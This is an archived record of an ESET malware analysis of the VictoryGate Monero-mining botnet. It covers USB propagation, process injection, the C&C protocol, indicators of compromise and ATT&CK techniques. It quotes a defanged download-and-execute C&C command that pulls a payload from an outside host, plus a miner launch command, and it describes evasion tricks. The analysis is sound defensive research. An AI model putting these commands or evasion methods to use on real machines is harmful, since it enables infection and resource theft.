{
	"id": "096bd512-44cf-45e2-ba77-d2bbfcf5f483",
	"created_at": "2026-04-06T00:06:27.748952Z",
	"updated_at": "2026-04-10T13:11:54.233163Z",
	"deleted_at": null,
	"sha1_hash": "7c2b5ca272789e45497c49601ed98c385653f9e6",
	"title": "Following ESET’s discovery, a Monero mining botnet is disrupted",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 499323,
	"plain_text": "Following ESET’s discovery, a Monero mining botnet is disrupted\r\nBy Alan Warburton\r\nArchived: 2026-04-05 14:34:43 UTC\r\nESET researchers recently discovered a previously undocumented botnet that we have named VictoryGate. It has\r\nbeen active since at least May 2019 and, since then, three different variants of the initial module have been\r\nidentified, in addition to approximately 10 secondary payloads that are downloaded from file hosting websites.\r\nThe initial module is detected by ESET security products as MSIL/VictoryGate.\r\nThis botnet is composed mainly of devices in Latin America, specifically Peru, where over 90% of the\r\ncompromised devices are located. We’ve been actively sinkholing several command and control (C\u0026C) domains,\r\nallowing us to monitor this botnet’s activity. The combination of the sinkhole data and our telemetry data allows\r\nus to estimate the botnet’s size to be at least 35,000 devices.\r\nTo control its botnet, VictoryGate used only subdomains registered at the dynamic DNS provider No-IP. ESET\r\nreported the malicious subdomains to No-IP, who swiftly took them all down, effectively removing control of the\r\nbots from the attacker. Also, ESET is collaborating with non-profit Shadowserver Foundation by sharing sinkhole\r\nlogs in an effort to further remediate this threat.\r\nIn Figure 1 you can see the peak number of unique IP addresses connecting to the C\u0026C per day.\r\nFigure 1. Connections to the C\u0026C\r\nThe main activity of the botnet was Monero mining. However, given that the botmaster was able to issue\r\ncommands to the nodes to download and execute new secondary payloads at any given time, this could have\r\nchanged at some point. 
This posed a considerable risk, given that we’ve identified compromised network traffic\r\nthat stems from the public sector and from organizations in the private sector, including financial institutions.\r\nThe impacts on the victim’s device are:\r\nhttps://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/\r\nPage 1 of 11\n\nVery high resource usage. In all the payloads we analyzed, the malicious code uses all available threads to\r\nperform cryptomining, which results in a sustained 90-99% CPU load. This slows down the device, causes\r\noverheating and possibly even damage.\r\nFiles that are contained on USB drives are hidden when connecting to an infested machine. This is part of\r\nthe propagation mechanism that we’ll discuss shortly.\r\nWe’ll cover some of the technical aspects of this threat in this post.\r\nWhat is VictoryGate?\r\nThis is the name we’ve given to the initial module that receives and executes commands from the C\u0026C server. It\r\nalso implements the propagation mechanism and establishes persistence on victimized devices.\r\nPropagation\r\nThe only propagation vector we have been able to confirm is through removable devices. The victim receives a\r\nUSB drive that at some point was connected to a compromised machine. It seemingly has all the files with the\r\nsame names and icons that it contained originally. Because of this, the contents will look almost identical at first\r\nglance, as seen in the example in Figure 2. However, the original files have been copied to a hidden directory in\r\nthe root of the drive and Windows executables have been provided as apparent namesakes.\r\nFigure 2. Comparison of a drive pre- and post-compromise with default Explorer options\r\nIn fact, these executables are AutoIt scripts that are compiled on the fly by VictoryGate, using the template in\r\nFigure 3. 
It is worth noting that the build process will also add random metadata to each file so that any two\r\ncompiled scripts will most likely never have the same hash.\r\nFigure 3. The template used by VictoryGate to compile the propagation scripts\r\nWhen an unsuspecting user “opens” (i.e. executes) one of these files, the AutoIt script will open both the file that\r\nwas intended and the initial module (see Figure 4), both of which VictoryGate placed in the hidden directory\r\nmentioned above.\r\nFigure 4. Propagation script that shows launching a regular file along with executing the malicious module\r\nOnce the initial module is executed, it will create a copy of itself in %AppData% (with a nicer name like\r\nctfmon2.exe) and a shortcut in the startup folder pointing to this copy, as a simple mechanism to gain persistence\r\nupon system boot.\r\nThis module is an approximately 200 MB .NET assembly that contains a huge array with garbage bytes. This is\r\nlikely done to avoid scanning by some security products that have file size or other resource consumption limits.\r\nThe array also contains an XORed and gzip-compressed DLL that, at runtime, is deciphered and loaded with a late\r\nbinding call using the .NET Reflection API.\r\nThe DLL itself contains a packed AutoIt-compiled script like the one seen in Figure 3, as well as the methods\r\nrequired to inject it into some legitimate Windows process. We’ve seen vbc.exe (Visual Basic Compiler) or\r\ncsc.exe (Visual C# Compiler) being targeted.\r\nThe injection is done by creating an instance of the vbc.exe process in a suspended state, unmapping its memory\r\nsections and then loading the executable from memory. 
As can be seen in Figure 5, VictoryGate will use several\r\nundocumented NTAPI functions such as NtWriteVirtualMemory, rather than using the more common API function\r\nWriteProcessMemory, to avoid basic API-hooking detection.\r\nFigure 5. vbc.exe process injection performed by VictoryGate\r\nThe injected AutoIt agent is responsible for communication with the C\u0026C server, download and execution of the\r\nsecondary payloads, and also will constantly scan to detect whether a new USB drive has been connected and, if\r\nso, will replace the files that it contains with propagation scripts and hide the original files.\r\nCommunication with C\u0026C servers\r\nAs mentioned before, the botmaster had the ability to send commands to the nodes to add new secondary\r\npayloads. These commands were issued in cleartext, using a custom protocol over uncommon ports. The following\r\ncommands were supported:\r\nCommand Description\r\n!\r\nThe C\u0026C tells the node to download a file from a given URL and then execute it. The node\r\nwill also use the prefix to notify the C\u0026C that the task has been completed without errors.\r\n~\r\nThe node uses this prefix to notify the C\u0026C that there has been an error while performing the\r\ntask.\r\n-\r\nThis prefix is used by the node during the first message to the C\u0026C, where it sends information\r\nabout the system such as username, hostname, antimalware product installed, AutoIt version,\r\netc. 
After that, it is used as a Keep-Alive between server and client.\r\n_\r\nThe node notifies the C\u0026C that the current execution path is different than the one expected.\r\nThis will also trigger the same mechanism that is used when the file is executed from the USB\r\ndrive – it will copy itself to %AppData%.\r\nHere is a defanged example of a download-and-execute command:\r\n!|N-I-C-H-O-L-A-S|!|N-I-C-H-O-L-A-S|PuQPQOZOy.exe|N-I-C-H-O-L-A-S|http://gulfup[.]me/i/00711/2czcy5xvh7br.jpeg[N-E-K]\r\nwhere the URL is the payload to download to the %temp% directory and PuQPQOZOy.exe is a randomly-generated name to be assigned to the file once it is downloaded.\r\nDownloaded payloads\r\nDownloaded payloads are typically AutoIt-compiled scripts as well. The AutoIt compiler has the ability to bundle\r\nbinaries with the script, in one standalone file. These binaries can then be executed by the script using the AutoIt\r\nShellExecute function when the compiled executable is run. When executed, this file will first create a scheduled\r\ntask and another shortcut in the startup folder to gain persistence for this new binary. The execution flow of the\r\ndownloaded payload in most of the samples analyzed is as follows:\r\nFigure 6. 
Workflow of the downloaded payload\r\nAgain, this payload will try to inject code into a legitimate Windows process; this time it’ll inject the XMRig\r\nmining software into the ucsvc.exe (Boot File Servicing Utility) process.\r\nOnce executed, tpmvscugr.exe will first decipher a Rijndael-encrypted array, which is a packed binary that we call\r\ngate.exe – its methods are then invoked using the .NET Reflection API as seen in the previous stage.\r\nThis packed binary doesn’t have the necessary code to perform the injection itself; rather, the last piece of code\r\nrequired to inject into the ucsvc.exe process is a DLL downloaded from the C\u0026C that is first stored in a registry key\r\n(see Figure 7) and then loaded into the tpmvscugr.exe process memory during runtime.\r\nFigure 7. Registry key containing auto.dll\r\nThis DLL (auto.dll) is sent through network traffic using gzip compression and AES encryption. The key to\r\ndecipher it has to be recovered from the communication between the C\u0026C and the node. It is then loaded during\r\nexecution by performing a late call. It contains some typical RunPE functions that allow gate.exe to perform the\r\ninjection.\r\nMonero mining\r\nOnce the ucsvc.exe process is injected with the XMRig miner, the C\u0026C will start the mining on the node by\r\npassing a command like the following:\r\nC:\\Windows\\system32\\ucsvc.exe -algo cryptonight -url \u003cRedacted\u003e:19019 --user CPU_x64 --pass x --retries=50 --retry-pause=1 --keepalive --donate-level=1 --nicehash\r\nThe IP address seen in the command is actually not a mining pool, but a stratum proxy – or XMRig Proxy. Also, in\r\norder to hide the CPU usage from the user, the mining process will be terminated if the user opens Task Manager;\r\nmining will be resumed as soon as Task Manager is closed. 
This technique has been seen in many other threats of this kind.\r\nFrom the data collected during our sinkholing activities we can determine that there are, on average, 2,000 devices\r\nmining throughout the day. If we estimate an average hashrate of 150 H/s, we could say that the authors of this\r\ncampaign have collected at least 80 Monero (approximately US$6000) from this botnet alone.\r\nConclusion\r\nVictoryGate is a new botnet that uses USB drives to propagate, a technique that we’ve seen repeatedly over the\r\nyears in Latin America. The usage of AutoIt and XMRig to develop cryptomining malware is also a trend that has\r\nseen a recent increase.\r\nOne of the interesting characteristics about VictoryGate is that it shows a greater effort to avoid detection than\r\nprevious, similar campaigns in the region. However, the most interesting factor of this investigation has been our\r\nability to register unused domain names hardcoded into the malware samples, allowing us to sinkhole a significant\r\npart of the C\u0026C infrastructure and share the collected data with Shadowserver in order to remediate this attack.\r\nNo-IP was also helpful in taking down the main domain names used by the botnet, which disrupted at least a\r\nportion of the botnet.\r\nDespite our efforts, compromised USB drives will continue to circulate and new infestations will still occur. The\r\nmain difference is that the bots will no longer receive commands from the C\u0026C. This will prevent new victims\r\nfrom downloading secondary payloads from the internet. However, those PCs that were afflicted prior to the\r\ndisruption may continue to perform cryptomining on behalf of the botmaster. 
We provide a free tool to clean your\r\nPC if you think it has been compromised by this malware: you can use ESET Online Scanner to effectively\r\nremove this threat.\r\nIndicators of Compromise (IOCs)\r\nSamples\r\nESET detection name Hash\r\nMSIL/VictoryGate.A 398C99FD804043863959CC34C68B0305B1131388\r\nMSIL/VictoryGate.A a187d8be61b7ad6c328f3ee9ac66f3d2f4b48c6b\r\nMSIL/VictoryGate.B 483a55389702cdc83223c563efb9151a704a973e\r\nMSIL/VictoryGate.C 686eef924e6b7aadb5bcff1045b25163501670e6\r\nFilesystem\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.ico\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.exe\r\n%ProgramData%\\JcmewjJky\\jcmewjjky.au3\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ctfmon.url.lnk\r\n%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\tpmvsucgr.url\r\n%AppData%\\tpmvscugr.exe\r\n%AppData%\\ctfmon2.exe\r\nHKCU/Software/JcMewjJKy\r\nHKLM/Software/Microsoft/Windows NT/CurrentVersion/Schedule/TaskCache/Tree/rwIAMblfuvoss\r\nHKCU/Software/Victory\r\nC\u0026C Domains\r\nPayload 
URLs\r\nMITRE ATT\u0026CK techniques\r\nTactic | ID | Name | Description\r\nInitial access | T1091 | Replication through Removable Media | Compiles AutoIt scripts that replace original files on the USB drive.\r\nExecution | T1064 | Scripting | Uses AutoIt and VBS scripts in various stages of the malware.\r\nExecution | T1129 | Execution through Module Load | Loads and runs binaries during execution.\r\nExecution | T1085 | Rundll32 | Uses rundll32.exe through the AutoIt function INETGET to download payloads.\r\nExecution | T1106 | Execution through API | Uses API calls such as CreateProcessA, WriteProcessMemory to run binaries.\r\nExecution | T1053 | Scheduled Task | Creates a scheduled task to ensure the miner will run every minute.\r\nPersistence | T1158 | Hidden Files and Directories | Creates hidden directories to hide the payload and propagation files.\r\nPersistence | T1060 | Registry Run Keys / Startup Folder | Creates a file with LNK extension (shortcut) in the Windows startup folder.\r\nPersistence | T1053 | Scheduled Task | Creates a scheduled task to ensure the miner will run every minute.\r\nPrivilege Escalation | T1055 | Process Injection | Gains privilege by injecting itself into legitimate Windows processes.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | Uses base64 encoding and other obfuscation techniques in various places.\r\nDefense Evasion | T1222 | File and Directory Permissions Modification | Sets +RHS attributes on files and directories.\r\nDefense Evasion | T1009 | Binary Padding | Uses binary padding to create propagation scripts that have different hashes.\r\nDefense Evasion | T1107 | File Deletion | Files downloaded in the %temp% directory are later deleted.\r\nDefense Evasion | T1093 | Process Hollowing | Legitimate Windows processes are hollowed and then injected.\r\nDefense Evasion | T1045 | Software Packing | Many files contain packed binaries using custom techniques.\r\nLateral Movement | T1091 | Replication through Removable Media | The initial payload is copied to a hidden directory in a removable drive.\r\nCollection | T1005 | Data from Local System | Some information about the host device is exfiltrated, including username, hostname, antimalware solution, and others.\r\nDiscovery | T1063 | Security Software Discovery | Performs WMI queries to discover security software installed on the machine.\r\nDiscovery | T1057 | Process Discovery | Tries to determine if the task manager process is open in order to suspend the mining activities.\r\nCommand and Control | T1094 | Custom Command and Control Protocol | C\u0026C uses two non-standard protocols.\r\nCommand and Control | T1065 | Uncommonly Used Port | C\u0026C uses uncommon ports such as 3030, 6060 and 19019.\r\nCommand and Control | T1008 | Fallback Channels | Uses backup domain names.\r\nCommand and Control | T1102 | Web Service | Uses Pastebin to recover the C\u0026C IP even if DNS resolution fails.\r\nImpact | T1496 | Resource Hijacking | Victim’s hardware is used to mine cryptocurrency.\r\nImpact | T1492 | Stored Data Manipulation | Files stored on USB drives are hidden from the user.\r\nSource: 
https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/"
	],
	"report_names": [
		"eset-discovery-monero-mining-botnet-disrupted"
	],
	"threat_actors": [],
	"ts_created_at": 1775433987,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.pdf",
		"text": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.txt",
		"img": "https://archive.orkl.eu/7c2b5ca272789e45497c49601ed98c385653f9e6.jpg"
	}
}